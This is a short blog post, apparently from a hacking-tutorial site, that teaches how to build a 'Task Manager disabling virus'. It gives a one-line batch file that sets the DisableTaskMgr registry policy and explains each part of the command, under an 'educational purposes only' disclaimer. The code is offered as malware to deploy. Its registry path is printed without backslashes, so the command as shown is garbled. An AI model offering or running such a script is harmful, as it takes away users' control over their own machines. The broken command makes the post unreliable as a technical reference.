Quantcast
Channel: How to Hack » Windows Hacking
Viewing all articles
Browse latest Browse all 6

How to create a Task Manager disabling virus | Disable Task Manager

$
0
0

How to Create a task manager disabling virus

In this tutorial I am going to teach you how to create a Task Manager Disabling virus. This virus will disable Task manager using Registry Editor i.e. regedit. Read this post and post your feedback in comments. Do share this page with your friends help us to grow !

 
 

Steps:-

1)Copy the fllowing code to a batch file :-
@echo off
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

2) Save it as anyname.bat.


Explanation:-

1)REG add -it used to add registry to the windows.
2)HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem :- path of the registry
3)REG_DWORD :- data type
4)0: it is default value and means fasle. 1 stands for true.
if the dword value is0 the registry DisableTaskMgr is false andtask manager will work.
if the dword value is 1 the registry DisableTaskMgr is true and task managaer will be blocked.
5)So just change 0 and 1 to enable/disable the task manager.


NOTE:-This tutorial is for educational purposes only,Use at your own risk.

How to hack is not responsible for any type of loss caused due to this information!!


Viewing all articles
Browse latest Browse all 6

Latest Images

Trending Articles



Latest Images